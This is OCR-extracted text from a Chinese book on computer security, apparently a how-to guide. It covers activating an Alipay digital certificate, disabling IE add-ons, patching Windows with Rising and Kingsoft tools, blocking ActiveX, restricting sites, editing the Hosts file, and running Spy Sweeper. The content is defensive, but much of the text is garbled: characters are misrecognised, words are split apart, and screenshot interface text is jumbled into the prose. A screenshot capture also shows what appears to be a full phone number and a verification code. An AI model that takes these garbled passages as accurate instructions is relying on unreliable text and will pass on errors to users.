资金 。 下 面 介 绍 启 用 数字 证 书 的 具体 步骤 。 


STEP01: 查看 “未 启用 的 保护 ”列表 STEP02: 管理 数字 证 书 








数字 证 书 “ 咒 +200 | 功能 介绍 ”管理 我 的 证 书 ” 历史 记录 
外 未 启用 的 保护 (6 项 ) 


邮件 通知 资金 变动 ， 发送 邮件 通知 您 | 您 正在 本 机 安装 数字 证 书 。 
下 一 步 将 发 送 验 证 码 短信 到 您 账户 绪 定 的 手机 136*=****60 ”更 换 手 机 





ee 资金 的 身份 人 | 
CET | 当前 绪 定 的 手机 : | 13693641260 请 输入 完整 手机 号 码 
QQ 安全 中 心 同步 绪 定 QQ 手机 令 牌 ， 账户 动态 尽 在 掌握 

权威 认证 ， 6 往 动态 口令 保护 账户 安全 


提高 信人 性 级别， 交易 更 受信 人 性 


高 级 身份 验证 ， 确保 资金 安全 





单 击 “数字 证 书 ” 右 侧 的 “启用 ”按钮 。 填写 手机 号 等 相关 信息 ， 然 后 单 击 “下 一 步 ” 按 钮 。 
STEP03: 填写 验证 码 STEP04: ”数字 证 书 安 装 成 功 


S| i se 数字 证 书 。 功能 介绍 。 管理 我 的 证 书 。 历史 记录 


2 验证 码 短信 已 发 送 到 您 的 手机 136******60 我 想 换 号 
您 在 本 机 成 功 安 妆 了 数字 证 书 


您 可 以 在 本 机 操作 账户 资金 (如 : 付款 、 提现 、3 
如 果 您 在 网 吧 等 任 共 场所 安装 了 证 书 ， 为 了 账 广 


请 填写 验证 码 : | 586304| 没有 收 到 验证 码 v 


E33 





i 





填写 验证 码 ， 并 单 击 “确定 ”按钮 。 查看 提示 信息 ， 并 单 击 “确定 ”按钮 。 
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本 四 间 话 软件 的 清除 和 
= 系统 清理 


现在 网 络 上 的 流 旋 软件 与 间谍 软件 很 多 ， 往 往 在 用 户 滨 网 页 时 安 : 
这 些 软件 ， A 安装 便 很 不 好 纯 载 ， 只 能 使 用 专用 清除 工具 才能 i 
行 彻底 的 清 


EDD 
O 流 虑 软件 的 清除 
O 间谍 软件 防护 实战 
常见 的 网 络 安全 防护 工具 








EE 当 

RE 7 > 
用 攻防 从 入 门 到 精通 
小 全 人 人 他 





流 虑 软件 的 清除 


一 些 “流氓 软件 ”会 通过 捆绑 共有 于 软件 、 采 用 一 些 特殊 手段 频 莹 弹出 广告 窗口 、 急 取 
用 尸 隐私， 严重 干扰 用 户 正 第 使 用 计算 机 ， 真 可谓 “彻头彻尾 的 流氓 软件 ” 根据 不 同 的 特 
征 和 危害， 困扰 广大 计算 机 用 户 的 流 谍 软件 主要 有 广告 软件 、 间 诛 软 件 、 浏 览 亏 文 持 、 行 
为 记录 软件 和 恶意 共 圣 软件 5 类 。 

















19,11 ”清理 浏览 器 插件 


现在 有 很 多 与 网 络 有 关 的 工具 ， ee en a 于 都 可 能 在 安 猜 时 
在 浏览 器 中 安 闭 插 件 ， 这 些 插件 有 时 并 无 用 处 ， 还 可 能 是 流氓 软件 ， 所 以 有 必要 将 其 
清除 。 

ActiveX 技术 是 一 种 共享 程序 数据 和 功能 的 技术 。 一 般 软 件 需 要 用 户 单 独 下 载 
然后 执行 安装 ， 而 ActiveX 插件 只 要 用 户 浏览 到 特定 的 网 页 ,IE 浏览 右 就 会 目 动 下 
载 并 提示 用 户 安 朔 。 目 前 很 多 软件 都 采取 这 种 安 儿 方式， 如 播放 Flash 动画 的 播放 
插件 。 

当然 ， 很 多 流氓 软件 也 利用 浏览 右 的 这 一 特点 ， 并 不 进行 提示 而 是 百 接 下 载 安 疫 ， 甚 
至 有 些 亚 意 插 件 还 会 更 改 系统 配置 ， 严 重地 影响 了 系统 运行 的 稳定 性 。 

(1) 使 用 Windows 7 插件 管理 功能 

如 果 用 户 使 用 的 系统 是 Windows 7 及 其 以 上 版 本 的 系统 ， 则 在 了 正 浏 览 右 的 “工具 ”这 
单 中 将 出 现 一 个 “管理 加 载 项 ” 沫 单 命 令 。 通 过 访 这 单 命令 ， 用 户 可 以 对 已 经 安 钱 的 下 插 
(不 傈 千惠 上 全 困 二 全 放 二 大 下 。 


STEP01: 打开 IE 浏览 器 STEP02: 打开 “管理 加 载 项 ”对 话 框 
































CS 的 区 http//www.haol2 BB D= Je hao123_ 上 网 从 这 里 开始 
简 v 国 -四 出 页 而 (P)” EEC 国有 见 吕 


es 主页 不 再 被 往 改 ,hh 
和 台新 打开 上 次 浏览 会 话 (S 








Alipay.com Co.,Ltd 
EditCtrl Class Alipay.com Co.Ltd 
webmod Class Alipay.com Co.Ltd 
Beijing Funshion Online Technologies ltd. 
=] 风行 视 沈 雪 放 及 下 载 组 件 Beijing Funshion Onlin... 
« UL 


， 请 重 试 
国 弹出 窗口 阻止 程序 (P) 


查看 下 载 (N) Ctrl+] 








| 当前 已 ho 载 的 ho 载 项 








shockwave Flash Object 
be Systems Incorporated 


11.7.700.169 类 型 : 
通过 有 从 的 控 过 提供 程序 首 系 此 j0 载 项 (O 〇 





坦 找 更 多 工具 栏 和 扩展 (有 
了 解 有 关 工具 栏 和 扩展 的 详细 信息 (N 








选择 “工具 ”> “管理 加 载 项 ”菜单 命令 。 可 查看 已 运行 的 加 载 项 的 名 称 、 发 行者 、 状 态 等 信 


自 
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STEP03: 屏蔽 插件 


插件 “类 型 ”包括 工具 栏 、 第 三 方 按钮 、ActiveX 
控件 、 浏 览 器 扩展 等 。 用 户 可 以 根据 需要 选取 某 个 
插件 ， 右 击 并 从 快捷 菜单 中 选择 “禁用 ”命令 将 其 
屏蔽 。 











复制 (D) 





(2) 使 用 IE 插件 管理 专家 

“IE 插件 管理 专家 ”(Upiea) 的 IE 插件 屏蔽 功能 突破 了 传统 的 插件 屏蔽 软件 思维 模 
式 ， 它 不 仅 能 够 屏 藤 插件 ， 而 且 可 以 识别 当前 已 安装 的 插件 ， 并 可 番 载 插件 。 有 具体 操作 
ls 


STEPO1: 


le 联系 我 们 于 Upiea 


插件 免疫 插件 管理 | 系统 设置 | 网 站 免疫 | 工具 | 


回 MSN Games 


网 MSN Games 
MSN Games 
MSN Games 
MSN Games 
MSN Games 


售 
一 SN 


于 “IE 播 件 管 


{00B?1CFB-68... 


{F8BFODOD-OB... 
{2917297F-F02... 
{DF780F87-FF2... 
{B8BESE93-86... 
{BE0D4DE5.31.. 


言 方 网 站 联系 我 们 ”关于 Upiea 


STEP02: 切换 至 “插件 管 


理 ” 选 了 项 赴 


插件 免疫 | 插件 管理 系统 设置 一 网 站 免疫 | | 
插件 名 称 品 1 中 | 


360sdbho Class 
Lync Browser Helper 


及 且 下 直人 
雷 下 载 支 持 


人 Document Cache Handler 
Safehion Class 
Microsoft SkyDrive Pro Browser Helper 


{0F4BF955-A12... 
{31D09BAO0-12... 
{48DBABBD-E... 
{889D2FEB-54... 
{B43a835-0E... 
{BESF34DD-FOQ... 
{D0498E Qa-45... 
{DEO5CF da-7B... 
{14c1d00e-0b9... 


i 


NeoPlayForm {7BBFE245-928... hE 干 {24c1d00e-0b9... 


Nexon Co., Ltd. Mabinogi Web Renderer {7623BE59-D4... hE 三 {2670000A-735... 已 

QQGame {3D8F74EE-86 Lync Browser Helper 中 D09BA0.12.， 
FF Wah 一 |; B WW Help 

北京 宽带 了 游戏 频道 {COC13879-6A... LuncBrowserHelper ”Ml| 


硅谷 动力 游戏 先锋 精灵 {354D8461-549... ; 热 绰 一 0 上 星 给 右键 菜单 
简单 游 {D8B23285-10... | 人 和 了 已 启用 下 全 人 E 
四 可 乐 吧 互 动 娱 乐 世界 {BBATCCTF-01... 和 浏览 

回 可 乐 吧 互 动 娱乐 世界 {2D4851FD-08... | 迅雷 看 看 播放 霹 播 放 | 下 区 
四 联众 世界 {99888952-AC6.. 六 全 

网 | 成 大 要 织 行家 CD 卡 滞 际 控件 {76146408.A66.， 











Upiea® SA ® -= 


单 击 “ 插 件 免 疫 ” 按 钮 ， 在 页 面 中 选择 需要 免疫 的 ”查看 已 加 载 插件 ， 选 取 某 个 插件 ， 单 击 下 方 的 “ 启 
插件 ， 单 击 “ 应 用 ”按钮 ， 即 可 完成 该 插件 的 免疫 ”用 ”或 “禁用 ”按钮 可 将 其 设置 为 启用 或 禁用 状态 ， 
操作 。 插件 免疫 后 ， 系统 将 不 能 再 安装 相应 的 插件 。 还 可 单 击 “ 删 除 ” 按 钮 将 所 选 插件 删除 。 
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攻防 从 入 门 到 精通 
全 人 人 他 


STEP03: 切换 至 “系统 设置 ”选项 卡 


2% Upiea Bulid 20070504 ， 
| 证 方 网 站 ”联系 我 们 关于 Upiea 





在 该 选项 卡 中 可 进行 浏览 器 设置 、 软 件 卸 载 、 启 动 


:在 
一 和 XIE 项 目 管理 以 及 系统 清理 等 。 
[about:blank [使 用 其 他 主页 | 
[http: /7go.microsoft.com/fwlink/?Linkld=54896 | 使 用 其 他 搜索 引擎 ~| 
| 
http: sie.search.msn.com/SUB_RFC176E. | 使 用 默认 搜索 引擎 > | 








厂 禁止 使 用 Interneb 先 项 


站 区 上 上 信用 常规 页 





10:1.2 流 谍 软件 的 防范 


对 于 流氓 软件 ， 除 在 遭受 其 “ 驿 扰 ” 和 “入 侵 ” 后 进行 “ 亡 壮 种 牢 ” 外 ， 难 道 束 真 的 
没有 办 法 了 吗 ? 其 实 更 应 做 好 事前 防范 ， 打 造 具 有 “ 尝 谍 软件 ”免疫 功能 的 电脑 系统 。 具 
体 可 以 从 以 下 儿 方 面 看 手 。 

1) 及 时 更 新 补丁 程序 。 如 来 觉得 下 载 补丁 程序 太 麻 烦 ， 则 可 以 利用 安 北 的 儿 毒 
软件 、 防 火 墙 等 安全 工具 中 的 源 凋 扫 揪 功能 ， 扫 插 目 己 的 系统 并 目 动 下 载 安 冯 补 丁 
程序 。 在 扫描 系统 漏洞 前 ， 应 先 升 级 到 最 新 版 本 ， 否 则 可 能 无 法 检 训 出 最 新 发 布 的 
补丁 程序 。 

下 面 以 珊 星 安全 助手 为 例 介 绍 扫描 系统 漏 调 并 下 载 补丁 的 操作 方法 。 


STEP01: 运行 到 星 安全 助手 STEP02: 对 软件 进行 升级 

















入 智能 升级 正在 进行 . 己 过 
获取 最 新 版 本 

















涪 宝 持 卖 ”凡客诚 品 毒 忆 包 


¢ 部 分 修复 完成。 
90 尚 有 部 分 问题 需要 您 手工 修复 ， 建议 您 修复 后 重新 体检 。 当当 网 。 京东 商城 。 此 扫 网 
名 宝 商 城 。” 中 执 我 殉 亦 考 林 
购买 彩票 “今日 团购 棕色 蓉 


可 优化 项 (2) 加 | 


下 载 组 件 KssaVer.xml 交 件 【RH 


当前 进度 : Laem 


田 发 现 1 个 电脑 问题 ， 需要 修复 





144 游 戏 43 
蒂 戏 1 游戏 7K7K 苗 戏 ~» 

和 轴 电 且 有 安安 全 件 二 要 工作 导体 进度 : | 

安全 上 网 瑞星 安全 网 
使 用 疗 迹 已 清理 日 搜狗 Q 

安全 项 (56) 

浪 网 搜狐 站 宝 商 
迟 牙 IE 扩展 按 祖 [ 未 见 异 守 ] 河 易 凤凰 网 族 讯 网 
修 筷 1E 匀 村 用 功能 [未 风 异 完 ] WW A 全 
对 统 相关 项 [未 见 异常 ] cis Oe 隐藏 升 级 窗口 停止 升级 5) 
点 面 图 标 [未 风雷 ] 








单 击 “检查 更 新 ”链接 。 显示 升级 进度 。 
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STEP03: 返回 主 界面 进入 “电脑 修复 "标签 STEP04: 重新 扫描 


检测 项 目 


UD IEWia HN (WS] 
口 修复 IE 扩展 按钮 ( 扫 榨 完成 ， 发现 10 处 异常 项 ) 清除 IE 工 具 栏 中 的 扩展 按钮 ， 加 束 1E 的 启动 速度 


口 修复 1E 被 禁用 功能 〔 扫 迫 完 成 ， 发现 1 处 异常 项 ) 
口 iE 浏览 锋 上 的 额外 按 纽 {08B0E5C0-4FCB-11CF-AAA5-00401C608... 


口 1E 主 页 柜 关 注册 表 权限 可 能 被 悉 意 软件 修改 

口 IE 浏览 器 上 的 额外 按钮 [(14c1d00e-0b92-4379-880b-444fa2d740.… 
文件 关联 修复 ( 扫 接 完成 ,发 现 1 处 异常 项 ) 

口 1E 浏 临 话 上 的 额外 按钮 [启动 迅 二 看 看 播放 器 ] 


Lnk 文 件 关联 
口 IE 浏览 器 上 的 额外 按 祖 [发 送 至 OneNote] 


口 系统 柜 关 项 扫 接 完成， 发 现 1 处 异常 项 ) 
口 下 浏览 器 上 的 额外 按钮 [Lync 单 击 以 呼叫 ] 


口 正 反 追踪 防护 





程序 自动 进行 扫描 ， 扫 描 完成 后 即 可 看 到 系统 中 的 ”修复 完成 后 可 选择 “重新 扫描 ”对 系统 再 次 扫描 ， 
所 有 插件 ， 程 序 自动 选择 对 系统 有 威胁 的 插件 ， 单 ” 若 显 示 “ 没 有 发 现 危 险 项 ”， 则 表示 流氓 软件 清理 
击 “ 立 刻 修复 ”按钮 即 可 对 系统 进行 修复 。 成 功 。 


开启 安全 防护 

用 户 也 可 使 用 瑞星 安全 助手 的 安全 防护 功能 对 系统 安全 体系 和 系统 漏洞 进 
行 实时 监控 ， 保 证 系统 处 于 相对 安全 的 环境 。 将 系统 安全 体系 监控 和 系统 漏 酒 
监控 开启 ， 同 时 开启 恶意 网 站 访问 监控 、 恶 意 文件 实时 监控 和 一 病毒 免疫 监 
榨 。 开 启 恶 塌 网 站 访问 监控 ， 需 要 安装 瑞星 个 人 防火 墙 。 














自动 检测 系统 漏洞 、 软 件 漏洞 ， 并 及 时 提 妊 您 收复 皮 现 的 漏洞 


当 您 打开 文件 时 ， 自 动 截获 和 查 杀 文件 中 存在 的 木马 、) 


U 盘 病毒 免疫 监控 
“@ 阻止 U 盘 扒 帝 的 病毒 在 系统 中 运行 ， 防 止 系 统 被 感染 


版 本 : 01.00.02.56 【检查 更 新 ) 仿 已 连接 到 " 云 安 全 "中 心 





2) 禁用 ActiveX 脚本 。 禁 用 ActiveX 脚本 可 以 阻止 恶意 IE 插件 的 安装， 但 也 能 
够 造成 某 些 使 用 ActiveX 技术 的 网 页 无 法 正常 显示 。 禁 用 ActiveX 脚本 的 具体 操作 方 
法 如 下 。 
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信人 公公 
STEPO1: 





选择 一 个 区 域 以 查看 或 更 忌 安 全 设置 。 


NA RU 


人 anet 


Internet | ey [5) 


O 


读 区 域 的 安全 级 别 (L) 
该 让 中 到 高 


~ = A 了 


了 二 | | |] 
将 所 有 区 开 重 村庄 认 级 别 罗 





匡 确定 = [= 取消 sa | 应 用 避 | 


右 击 桌面 上 的 “Internet 单 击 “ 自 定义 级 


图 标 ， 从 快捷 菜单 中 选择 


“选项 ” es 


别 ” 按 钮 。 


打开 “lnternet 选项 ”对 话 框 





攻防 从 入 门 到 精通 


STEP02: 安全 设置 


.HET Framework 
噶 XML 浏览 器 应 用 程序 
© 


名 启用 
名 提示 
98 XPS 广 档 
加 禁用 
园 启用 
加 提示 
9 松散 XANL 
生 禁用 
加 启用 
加 提示 


#+ 在 重新 自动 你 的 1 
重 置 自 定 义 设 置 


禁用 所 有 ActiveX 控 件 单 击 “确定 ， 
di 按钮 。 


3) 加 入 受 限 站 点 。 把 舍 有 恶意 插件 的 网 页 加 入 受 限 站 点 ， 使 下 浏览 融 不 能 打开 该 网 


页 。 有 具体 的 操作 方法 如 下 。 


STEP01: 和 返 国 “Internet 选项 ”对 话 框 


本 地 


Intranet 


绞 限 制 的 站 点 


S pg 会 损害 你 的 计算 机 


四 司 用 人 相模 式 要 求 守 当局 动 自 定义 角 别 已) | [加 认 级 别 @) 
将 所 有 区 域 重 置 为 默认 级 别 吧 ) 





国 切换 至 “安全 " 
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国 单 击 “ 受 限制 的 站 点 
选项 卡 。 标 ， 然 后 单 击 “ 站 点 ”按钮 。 


STEP02: 打开 “ 爱 限 站 点 ”对 话 框 


将 该 网 站 添加 到 | 区域 呈 ): 
http:/ /www.haol23.com 





| 用 除 企 ) | 


输入 需要 限制 登录 的 网 页 地 址 ， 单 击 “ 添 加 ” 按 
钮 ， 即 可 将 其 + 添加 进去 。 
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4) 修改 Hosts 文件 。Hosts 文件 又 称 域名 本 地 解析 系统 ， 以 ASCII 格式 保存 。 为 了 
在 互联 网 不 产生 冲突 ， 每 一 台 连 接 网 络 的 计算 机 都 会 分 配 一 个 IP 地 址 。 为 便于 记忆 ， 
又 引入 了 域名 的 概念 ， 所 以 当 用 户 在 下 地 址 栏 中 输入 域名 时 ， 系 统 先 查看 Hosts 文件 
中 是 否 有 与 此 域名 相对 | 应 的 IP 地 址 。 如 果 没 有 ,就 连接 DNS 服务 器 进行 搜索 ; 如 果 有 ， 
则 会 直接 登录 该 网 站 。Hosts 文件 和 省略 了 通过 DNS 服务 喜 解 析 域 名 的 过 程 ， 提 高 了 网 页 浏 
览 的 速度 。 在 Windows 7 系统 中 ， 可 使 用 “记事 本 ”打开 C:\Windows\System32\drivers\etc\ 
HOSTS 文件 ， 在 此 文件 中 输入 “127.0.0.1 www.abcd.com” 在 IP 地 址 和 域名 间 用 空格 分 
开 ， 保 存 后 退出 ， 将 www.abcd.com 网 站 域名 指 同 计算 机 本 地 的 IP 地 址 127.0.0.1， 从 而 
避免 下 载 插件 。 

5) 设置 网 页 安全 扫描 。 一 和 股 ， 反 病毒 软件 中 都 珊 有 防范 网 页 恶意 代码 的 功能 ， 例 
如 珊 星 卡 卡 上 网 安全 助手 中 的 “上 网 防护 ”功能 ， 束 具有 “不 展 网 站 访问 防护 ”“IE 防 
漏 墙 *“ 木 马 下 载 拦 截 ” 等 功能 ， 如 下 图 所 示 。 局 用 这 些 功 能 ， 用 户 访问 共有 悉 意 代码 
的 网 页 时 ， 束 会 主动 进行 提示 和 拦截 ， 防 止 恶 意 代 人 码 利 用 ActiveX 进行 下 载 和 执行 危险 
的 命令 。 


















































常用 实时 防护 高 级 工具 在 线 求助 杀毒 软件 防火 墙 软件 推荐 全 立即 升级 信 网 络 设置 


三 看 ”不 良 网 站 访问 防护 
| 依靠 强大 的 矿 星 恶 意 网 址 库 ( 数 十 石 个 钓鱼 、 挂 马 了 网 
地 址 》，, 实时 更 新 上 万 条 景 活 财 的 念 意 网 址 ， 当 您 访问 
这 些 亚 意 岗 站 时 发 出 售 报 。 欢 迎 举 报 各 类 恶意 同 站 。 


自 定义 不 良 网 站 黑 名 单 恶意 网 址 举报 


IE 防 漏 培 


实时 粘 近 TE 浏览 回 ， 当 病毒 试图 对 过 浏 览 
(| 
侵 和 恶意 插件 的 入 得 ， 


回 启 用 凑 出 代码 防护 自 有 禁用 





_ ”不 马 下 载 拦 夫 

sl 基于 业界 领先 的 反 木 马 技术 ,拦截 中 毒 电 脑 通 过 

| 所 pz 妆 表 多 的 病 雪 和 次 全 不 马 ， 有 次 志 制 “ 木 乌 阁 * 
(@ 的 到 


社 则 








瑞星 2009 开 启 " 云 安全 “时代 当前 版 本 : 6.0.1.30 病毒 库 发 布 日 期 : 2009-5-21 10:20 


“上 网 防护 ”页 面 
6) 使 用 专用 工具 进行 防疫 。 现在 网 络 上 有 很 多 专门 用 于 对 付 流 氓 软件 和 间 诬 软件 的 工 


具 ， 这 些 工具 一 般 都 具有 人 免疫 功能 ， 即 针对 已 知 的 流氓 软件 和 间 诬 软件 修改 注册 表 相 应 项 ， 
使 相应 的 流氓 软件 和 间谍 软件 不 能 目 动 下 载 和 安 冯 ， 从 而 保证 用 户 系 统 的 安全 、 稳 定 








10.:1.3 金山 清理 专家 清除 恶意 软件 


金山 清理 专家 是 一 款 上 网 安全 辅助 软件 ， 对 流行 森马、 恶意 插 件 尤 为 有 效 ， 可 解决 普 
通 杀 毒 软 件 不 能 解决 的 安全 问题 。 其 特点 有 : 永久 免费 ;免费 病毒 木马 查 杀 ; 健康 指数 综 
合 评分 系统 ; 查 杀 恶意 软件 + 超 强 抢 杀 技术 〈Bootclean); 互联 网 可 信 认 证 ;， 防 网 页 挂 马 功 


能 等 。 


用 金山 清理 专家 清除 恶意 软件 的 具体 操作 方法 如 下 。 
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ee 
py 


山 清 理 专家 


六 金山 清 理 专 @ © 


qing.duba.net 我 要 举报 。 产品 社区 。 毒 雪 首 页 。 在 线 客服 


健康 指数 


STEPO1: 











= 清理 专家 更 新 后 ， 您 还 没有 为 系统 打分 哦 ! 


清理 专家 怎样 为 系统 打分 : 
清理 专家 会 扫 扬 系统 中 的 恶意 软件 、 系 统 插 同 、 病 毒 、 可 颖 文件、 未 知 文件 、 启 动 ] 页 过 
多 、BH0、 系 统 盘 空间 、 杀毒 软件 云 装 等 情 品 ， 然 后 按照 各 项 去 全 评分 标准 为 您 的 系统 打出 健 


康 指数 得 分 。 
ZE 





食 版 本 信息 
恶意 库 版 本 : 2009.05.11.1 
漏洞 库 版 本 : 2009. 09. 23. 1 





加 您 & 有 安装 杀毒 软件 


[ 司 





点 击 此 处 了 解 金 山 毒 各 |“ 


单 击 “实时 保护 ”按钮 。 
STEP03: 查看 健康 指 考 





山 清 理 专家 © 6 6 


qing.duba.net 我 要 举报 。 产品 社区 。 毒霸 首页 。 在 线 客服 


健康 指数 “国有 


= 健康 报告 : 黄色 警报 ! 您 的 系统 存在 较为 显著 的 安全 风险 ， 推 荐 处 理 ! 


免 旨 下 载 全 山 毒 吉 








打分 结束 
共 扫 出 ! 个 问题 


本 次 检查 发 现 的 重大 问题 如 下 : 
9 在 系统 中 没有 发 现 已 知 的 杀毒 软件 


rr 
rr 








亚 意 库 版 本 : 2009. 05. 11.1 
漏洞 库 版 本 : 2009. 09.23.1 
重启 青 理 专家 将 自动 完成 升级 








单 击 “ 健 康 指数 ”按钮 ， 再 单 击 “ 为 系统 打分 ” 按 
钮 ， 开 始 全 面 扫描 系统 ， 扫 描 完 后 给 出 健康 指数 ， 
指出 问题 所 在 。 

STEP05: 漏洞 修复 


人 -金山 漏洞 信息 
















所 有 据 洞 0) | 软件 更 新 O) | 补丁 辣子 6) | 已 各 略 补 | 已 装 补 本 管理 | 。 选项 设置 | 
目 扫 据 出 0 个 易 洞 挟 HahT 下 载 地 Ht。 最 新 资讯 
等 级 。 补丁 名 称 漏洞 名 称 及 简 述 大 小 状态 中 国 互联 网 安全 月 报 -8 月 
金山 : 欢 季 380 加 入 云 音 杀 
圭一 外 央 放 游 类 网 站 频 营 挂 马 
是 淮 修 弛 了 我 89IE 主 页 


全 恭喜 ! 在 您 的 系统 上 没有 发 现 已 知 漏洞 和 软件 更 新 。 
免费 为 爱 机 做 全 面体 检 ， 上 网 安全 100 分 ! 


选择 需要 修复 的 补丁 类 型 : ”| 系统 局 癌 | 0ffice 项 滞 | | 软件 氛 油 
重新 扫 后 jj | 冯 覆 渤 引 硕 | 
埋 同 修复 引擎 版 本 : 2009. 10. 09. 561 ”漏洞 库 版 本 : 2009.09.23.1 


扫描 结束 后 ， 列 出 系统 所 存在 的 漏洞 。 选 取 需 要 修 
复 的 漏洞 ， 单 击 “修复 选 中 项 ”按钮 ， 即 开始 下 载 
系统 补丁 并 上 自动 安装 。 











380 














ZE 


STEPO2: 启用 "U 盘 防 火 墙 " 年 功 能 


Er U 盘 防火 墙 
有 效 防止 U 盘 中 的 病毒 ， 入 侵 您 的 电脑 。 





漏洞 防火 墙 
加 及 时 修复 系统 部 同 ， 有 效 防 止 感染 病毒 木马 或 黑客 入 侵 。 


回 网 页 防火 墙 New 
保护 你 的 上 网 安全 ,拦截 钓鱼 、 欺 诈 、 挂 马 等 恶意 网 站 。 
系统 防火 墙 


司 阻止 恶意 软件 、 木 马 等 修改 系统 关键 区 域 。 
拦截 历史 查看 程序 拦截 规则 自 定义 关键 区 域 项 


外 后 人 自动 升级 
| | 时 | 启动 实时 保护 时 ， 自 动 将 清理 专家 升级 有 最 新 版 本 。 


可 启用 或 关闭 “U 盘 防火 墙 ” 等 功能 。 
ES 恶 忌 、 意 软 件 查 杀 


@ © 
全 山 清 理 各 我 要 举报 


健康 指数 | 


恶意 软件 : 查 杀 恶意 软件 、 广 告 软件 、 隐 蔽 软件 


钱 


恶意 软件 





没有 发 现 恶意 软件 


| 广告 软件 
恶意 软件 ”名 项 ) 


第 三 方 插件 。 (0 项 ) 
信任 插件 6 项 ) | 


| _ 汤 油 修复 
| “在线 系统 诊断 


没有 发 现 广 告 软件 
隐藏 软件 
没有 发 现 隐藏 软件 


信任 选中 项 清除 选 定 项 














“恶意 软件 查 杀 ”按钮 ， 可 以 看 到 已 
其 数量 。 


单 击 
恶意 软件 分 类 及 


经 查 到 的 





到 可 进行 修复 系统 、 清 理 
垃圾 文件 、 清 除 历史 痕迹 、 


在 主 界面 中 
单 击 “ 安 全 百 宝 
箱 ” 按钮 。 


修复 浏览 器 等 操作 。 





< 第 19 章 
间谍 软件 的 清除 和 系统 清理 

19.2 加 谍 软件 防护 实战 
间谍 软件 的 主要 危害 是 严重 干扰 用 户 使 用 各 种 互联 网 (如 推广 弹出 式 广 告 )、 影 啊 用 户 


网 上 购物 、 干 扰 在 线 聊 天 、 欺 驴 用 户 浏 览 搜索 引擎 引 导 网 站 等 ， 同 时 还 有 可 能 导 和 化 机 带 速 
度 变 慢 、 网 络 突然 断 开 等 情况 出 现 ， 这 主要 是 因为 则 诬 软 件 会 占 去 大 量 系统 资源 。 














19:2.1 间谍 软件 防护 概述 


间谍 软件 主要 攻击 微软 操作 系统 ， 通 过 Internet Explorer 源 油 进入 并 隐藏 在 Windows 
的 薄弱 之 处 。 有 些 间谍 软件 (尤其 是 恶意 Cookie 文件 ) 可 以 在 任何 浏览 器 内 发 生 作 用 ， 但 
这 只 是 间谍 软件 中 很 小 的 一 部 分 。 微 软 的 一 些 软件 产品 , 如 Internet Explorer、Word、Outlook 
和 Media Player 等 ， 一 旦 下 载 就 将 目 动 执行 ， 从 而 使 间谍 软件 很 容易 乘虚 而 入 。 

如 果 出 现 如 下 情况 ， 则 用 户 的 机 器 可 能 已 经 存在 间谍 软件 或 其 他 有 害 软件 了 。 

@ 用 户 没 有 浏览 网 页 也 会 看 见 弹 出 式 广告 。 

@ 用 户 的 Web 浏览 器 先 打开 页 面 〈 主 页 ) 或 浏览 器 ， 搜 索 设 置 已 在 用 户 不 知情 的 情 

况 下 被 更 改 。 

@ 及 现 浏览 器 中 有 一 个 用 户 不 需要 的 新 工具 栏 ， 并 且 很 难 将 其 删除 。 

@ 计算 机 完成 某 些 任务 所 需 的 时 间 比 以 往 要 长 。 

@ 计算 机 骨 溪 的 次 数 突然 上 升 。 

间谍 软件 通常 和 显示 广告 软件 ( 称 为 “广告 软件 ”)、 跟 踪 个 人 、 敏 感 信息 等 软件 联系 
在 一 起 ， 但 并 不 意味 看 所 有 提供 广告 或 跟踪 用 户 在 线 活动 的 软件 都 是 恶意 软件 。 如 用 户 可 
能 要 注册 人 免费 首 乐 服务 ， 但 代价 是 要 同意 接收 目标 广告 。 如 果 同 意 了 该 条 球 ， 则 表示 已 确 
认 这 桩 交易 。 用 户 也 可 能 同意 让 该 公司 跟踪 目 己 在 线 活动 ， 以 确定 要 显示 的 广告 。 

其 他 有 害 软件 则 会 做 一 些 令 人 烦恼 的 更 改 ， 而 且 可 能 会 导致 计 算 机 变 慢 或 骨 沉 。 这 
些 程序 能 够 更 改 Web 浏览 器 的 主页 或 搜索 页 ,或 在 浏览 器 中 添加 用 户 不 需要 的 附加 组 件 ， 
还 可 能 会 使 用 户 很 难 将 自己 的 设置 恢复 为 原始 设置 。 防 范 的 关键 在 于 用 户 〈 或 其 他 使 用 
自己 计算 机 的 人 ) 是 否 了 解 软 件 要 执行 的 操作 ， 以 及 是 否 已 同意 将 软件 安装 在 自己 的 计 
算 机 上 。 

间谍 软件 或 其 他 有 害 软件 有 多 种 方法 可 以 侵入 用 户 的 系统 ， 第 见 仪 俩 是 在 用 户 安装 需 
要 的 其 他 软件 (如 音乐 或 视频 文件 共享 程序 ) 时 ， 偷 偷 地 安装 该 软件 。 有 时 在 特定 软件 安 
闭 中 记录 包含 有 害 软 件 的 信息 ， 但 此 信息 可 能 出 现在 许可 协议 或 隐私 声明 的 结尾 。 




























































































10.2.2 ”用 $py SWeeper 清除 间谍 软件 


当 用 户 安 装 了 某 些 人 免费 的 软件 或 浏览 某 个 网 站 后 ， 束 可 能 被 间谍 软件 潜入 。 黑 客 除 
监视 用 户 的 上 网 习惯 (如 上 网 时 间 、 经 党 浏览 的 网 站 以 及 购买 了 什么 商品 等 ) 外 ， 还 有 
可 能 记录 用 户 的 信用 卡 账号 和 密码， 这 给 用 户 安 全 市 来 了 乍 大 隐患 。Spy Sweeper 是 一 
于 五星 级 的 间 诬 软件 清理 工具 ， 它 还 提供 主页 你 护 和 Cookies 保护 等 功能 。 具 体 的 操作 
步骤 如 下 。 
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EA 
取 RT 


ee 
& 
靳 
命 人 他 他 


STEP01: 运行 “Webroot AntiVirus” 


© webroot AntiVirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 











| Subscribe | 


Improve Your Protection 














Sweep | 


XK Last full sweep: Never 
Next sweep: 2013/11/22 1:00 





。 Block unwanted traffic 

es Clean your System 

e。 Back up your files 
Uparade Now 





Items detected to date: 0 


Sweep Now 

















Subscription 
] 
Shields | | nact 
~ Shields: 12 of 12 Recommended Shields are ON Check Status 







Items Blocked: 0 kN 











Gamer Mode [OFF] 









Updates | 


~ Last check Today | 
A Updates: ON Alerts 
Check for Updates 





TurmGamer Mode On | 











No open alerts 








单 击 页 面 左 侧 的 “Options” 按 钮 。 


STEP03: 和 上 自 定义 扫描 方式 


© webroot AntiVirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


合 Home 呈 options ww 
A Sweep Sweep | Shields | Update | Program | 
®® Shields Sweep Type 


About Sweep Options 划 


© Eull Sweep (Recommended) Custom Sweep lets you create custom settings for the search. 
© 0uick Sweep 





Sweep Al Attached Drives 


V | Al User Accounts 

w Direct Disk Sweeping 

Vv | Rootkits 

wv Verify Executable Programs 


Windows Registry 
Memory Objects 
Cookies 
Compressed Files 





